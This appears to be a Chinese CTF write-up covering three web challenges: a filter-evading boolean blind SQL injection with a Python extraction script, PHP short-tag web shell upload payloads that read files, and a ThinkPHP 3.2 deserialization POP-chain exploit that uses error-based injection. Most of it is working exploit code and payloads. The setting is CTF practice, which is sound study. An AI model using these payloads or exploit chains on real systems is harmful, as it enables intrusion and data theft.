happysql
简单fuzz发现过滤了
if,空格、or,and,information,单引号,benchmark,sleep,=,li k,+,-
等关键字但是双引号并未过滤。正好题目也是由双引号包裹的字符串,同时
#
也没有过滤可以顺利逃逸出来or和and 等逻辑运算符直接用
||
代替即可。等于号可以使用regexp
或者strcmp
,而字符串分割可以使用locate
代替。||
只要一边执行成功就能跳转到home.php
使用基于运行错误的BOOL盲注(http://www.plasf.cn/articles/spatial_functions_blind_inject.html),例如exp(710)即可溢出报错

- if使用
make_set
即可可以构造如下payload:
username=a"||exp(make_set((database()/**/regexp/**/binary/**/0x637466),0x373130,0x31))#&password=
- 如果猜测正确exp溢出导致SQL执行失败,返回
Username or password error!

- 猜测错误那么返回1,exp不溢出运行正常。

- 由于information被过滤使用
mysql.innodb_index_stats
代替发现可以,前面可以猜出数据库是ctf,直接猜表名
payload = {
'username':'a"||exp(make_set(strcmp((locate(binary/**/%s,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name/**/regexp/**/binary/**/0x637466),%s)),%s),710,1))#'%(ord2hex(j),i,i),
'password':''
}
- 猜出表名f1ag,但是innodb的方法无法猜出列名,但是可以简单测试出列名的个数为两个。
- 直接使用无列名注入即可综合上面分析最终EXP为:
#/**/coding=utf-8
import io
import requests
import threading
def ord2hex(string):
result = ""
for i in string:
r = hex(ord(i));
r = r.replace('0x','')
result = result+r
return '0x'+result
tables = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-}{,_'
flag = ''
sessid = 'flag'
for i in range(1,70):
for j in tables:
url = "http://eci-2ze2jur5bqu7g7b1eaws.cloudeci1.ichunqiu.com/login.php"
payload = {
'username':'a"||exp(make_set(strcmp((locate(binary/**/%s,(select/**/group_concat(x.2)/**/from/**/(select/**/2/**/union/**/select/**/*/**/from/**/f1ag)x),%d)),%d),710,1))#'%(ord2hex(j),i,i),
'password':''
}
resp = requests.post(url,data=payload)
#print(payload['username'])
if 'home.php' in resp.text:
flag = flag +j
print(flag)
break
write_shell
- 简单题
- 用短标签绕过对php的过滤,
$IFS$9
代替空格。
?action=upload&data=<?=`ls\$IFS\$9/`?>
- 直接得到文件列表
!whatyouwantggggggg401.php
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
- 直接用通配符读就好了
?action=upload&data=<?=`cat\$IFS\$9/*.ph*`?>
easytp
- 扫出源码:www.zip
- Thinkphp3.2,home控制器存在一个反序列化方法

网上找到一个POP链发现可以用https://www.jianshu.com/p/41782991b4b2
报错注入读到存在一个叫tp的数据库,里面有个叫f14g的表(以为用MYSQL导出日志GETSHELL整了半天在数据库里面)
- Exp
<?php
namespace Think\Db\Driver{
use PDO;
class Mysql{
protected $options = array(
PDO::MYSQL_ATTR_LOCAL_INFILE => true // 开启才能读取文件
);
protected $config = array(
"debug" => 1,
"database" => "mysql",
"hostname" => "127.0.0.1",
"hostport" => "3306",
"charset" => "utf8",
"username" => "root",
"password" => "123456"
);
}
}
namespace Think\Image\Driver{
use Think\Session\Driver\Memcache;
class Imagick{
private $img;
public function __construct(){
$this->img = new Memcache();
}
}
}
namespace Think\Session\Driver{
use Think\Model;
class Memcache{
protected $handle;
public function __construct(){
$this->handle = new Model();
}
}
}
namespace Think{
use Think\Db\Driver\Mysql;
class Model{
protected $options = array();
protected $pk;
protected $data = array();
protected $db = null;
public function __construct(){
$this->db = new Mysql();
$this->options['where'] = '';
$this->pk = 'id';
$this->data[$this->pk] = array(
"table" => "mysql.user where 1=updatexml(1,concat(mid((select f14g from tp.f14g),20,70),0x7e),1);#",
"where" => "1=1"
);
}
}
}
namespace {
echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}